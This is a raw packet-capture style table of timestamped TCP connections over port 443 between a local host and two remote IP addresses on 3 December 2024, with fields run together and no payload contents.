                                                                                                                      Dec 3, 2024 08:55:48.793687105 CET50053443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.793880939 CET44350053196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.793936968 CET44350053196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.793977976 CET50053443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.795439005 CET50053443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.795453072 CET44350053196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.795460939 CET50053443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.795511007 CET50053443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.795836926 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.795866966 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.795922041 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.796808004 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.796818018 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.834287882 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.834558964 CET50060443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.834569931 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.835462093 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.835525036 CET50060443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.835823059 CET50060443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.835879087 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.835983038 CET50060443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.835988045 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.847171068 CET44350052196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.847199917 CET44350052196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.847259998 CET50052443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.847287893 CET44350052196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.853645086 CET44350052196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.853703976 CET50052443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.853730917 CET44350052196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.853746891 CET44350052196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.853804111 CET50052443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.854190111 CET50052443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.854211092 CET44350052196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.854954004 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.854993105 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.855053902 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.856138945 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.856156111 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.859302044 CET4435005913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.860656023 CET50059443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:48.860676050 CET4435005913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.861658096 CET50059443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:48.861664057 CET4435005913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.870511055 CET44350051196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.870534897 CET44350051196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.870541096 CET44350051196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.870588064 CET50051443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.870618105 CET44350051196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.870631933 CET50051443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.878817081 CET50060443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.881604910 CET44350051196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.881675959 CET44350051196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.881690025 CET50051443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.881741047 CET50051443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.889278889 CET50051443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.889307022 CET44350051196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.889730930 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.889760971 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.889817953 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.890877008 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.890888929 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.903475046 CET44350054196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.903501987 CET44350054196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.903534889 CET44350054196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.903572083 CET50054443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.903603077 CET44350054196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.903646946 CET50054443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.904310942 CET50054443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.904355049 CET44350054196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.904400110 CET50054443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.904690981 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.904723883 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.904797077 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.905543089 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:48.905555010 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.958539009 CET4435005813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.958611012 CET4435005813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.958659887 CET50058443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:48.958965063 CET50058443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:48.958975077 CET4435005813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.958985090 CET50058443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:48.958988905 CET4435005813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.962420940 CET50073443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:48.962470055 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:48.962533951 CET50073443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:48.962694883 CET50073443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:48.962712049 CET4435007313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.100851059 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.101284981 CET50061443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.101294994 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.102360010 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.102444887 CET50061443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.102832079 CET50061443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.102889061 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.102937937 CET50061443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.142168999 CET50061443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.142179966 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.156658888 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.156692982 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.156704903 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.156735897 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.156738043 CET50056443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.156757116 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.156770945 CET50056443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.189079046 CET50061443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.199729919 CET44350057196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.199754953 CET44350057196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.199831009 CET50057443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.199847937 CET44350057196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.199889898 CET50057443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.201136112 CET50057443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.201176882 CET44350057196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.201231956 CET50057443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.201493979 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.201539040 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.204421997 CET50056443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.204462051 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.205012083 CET50074443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.205024958 CET44350074196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.314882994 CET4435005913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.316730976 CET4435005913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.316772938 CET4435005913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.316840887 CET50059443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:49.316879034 CET50059443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:49.316941977 CET50059443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:49.316941977 CET50059443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:49.316962957 CET4435005913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.316971064 CET4435005913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.320122004 CET50075443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:49.320162058 CET4435007513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.320262909 CET50075443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:49.320455074 CET50075443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:49.320471048 CET4435007513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.339776993 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.340126038 CET50062443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.340136051 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.340496063 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.340804100 CET50062443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.340878010 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.340970993 CET50062443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.387335062 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.390894890 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.390911102 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.390948057 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.390969992 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.390997887 CET50056443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.391031027 CET50056443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.391036987 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.391105890 CET50056443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.391735077 CET50056443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.391758919 CET44350056196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.392261028 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.392298937 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.392426014 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.393457890 CET50076443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.393477917 CET44350076196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.678190947 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.678215027 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.678222895 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.678302050 CET50060443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.678314924 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.687735081 CET4435006313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.688314915 CET50063443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:49.688334942 CET4435006313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.688834906 CET50063443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:49.688838959 CET4435006313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.694916010 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.694977999 CET50060443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.694978952 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.695028067 CET50060443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.695447922 CET50060443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.695457935 CET44350060196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.695808887 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.695847034 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.696723938 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.698764086 CET50077443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.698786974 CET44350077196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.937721014 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.937752008 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.937758923 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.937901020 CET50061443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.937927008 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.938554049 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.938627958 CET50061443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.938922882 CET50061443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.938940048 CET44350061196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.939343929 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.939385891 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.939455986 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.939831972 CET50078443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.939857006 CET44350078196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.941138983 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.943125963 CET50064443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.943142891 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.943506002 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.943799019 CET50064443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.943862915 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.943963051 CET50064443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:49.987335920 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:49.995176077 CET50064443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.063489914 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.063790083 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.063818932 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.064935923 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.065004110 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.065316916 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.065387964 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.065454960 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.065468073 CET44350065196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.119905949 CET50065443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.140315056 CET4435006313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.144165039 CET4435006313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.144222021 CET50063443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.144279003 CET50063443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.144296885 CET4435006313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.144306898 CET50063443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.144311905 CET4435006313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.147238016 CET50079443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.147294998 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.147366047 CET50079443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.147526026 CET50079443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.147547007 CET4435007913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.165770054 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.165796995 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.165873051 CET50062443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.165884972 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.180747986 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.180811882 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.180820942 CET50062443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.180859089 CET50062443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.181076050 CET50062443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.181087017 CET44350062196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.181864023 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.181895971 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.181962967 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.182698965 CET50080443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.182709932 CET44350080196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.197501898 CET4435006613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.198093891 CET50066443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.198105097 CET4435006613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.198573112 CET50066443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.198577881 CET4435006613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.377978086 CET4435006713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.378675938 CET50067443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.378705978 CET4435006713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.379177094 CET50067443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.379182100 CET4435006713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.395082951 CET44350068196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.395366907 CET50068443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.395385027 CET44350068196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.395700932 CET44350068196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.395996094 CET50068443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.396054029 CET44350068196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.396140099 CET50068443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.443341017 CET44350068196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.588421106 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.602284908 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.602304935 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.602755070 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.603111029 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.603169918 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.603293896 CET50069443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.624789953 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.625057936 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.625072002 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.625427008 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.625709057 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.625767946 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.625825882 CET50070443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.643332005 CET44350069196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.643873930 CET4435006613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.646965981 CET4435006613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.647016048 CET4435006613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.647032976 CET50066443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.647069931 CET50066443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.647140026 CET50066443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.647154093 CET4435006613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.650154114 CET50081443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.650188923 CET4435008113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.650247097 CET50081443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.651789904 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.652023077 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.652023077 CET50081443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:50.652033091 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.652050018 CET4435008113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.653062105 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.653127909 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.653467894 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.653552055 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.653598070 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.655142069 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.655340910 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.655365944 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.655721903 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.655989885 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.656049967 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.656085014 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.671325922 CET44350070196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.695339918 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.698420048 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.698421001 CET50072443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.698426008 CET44350071196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.698448896 CET44350072196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.744353056 CET50071443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.759385109 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.759418011 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.759427071 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.759453058 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.759495020 CET50064443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.759512901 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.759526014 CET50064443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:50.767627001 CET44350064196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:50.767688990 CET44350064196.22.142.143192.168.2.4
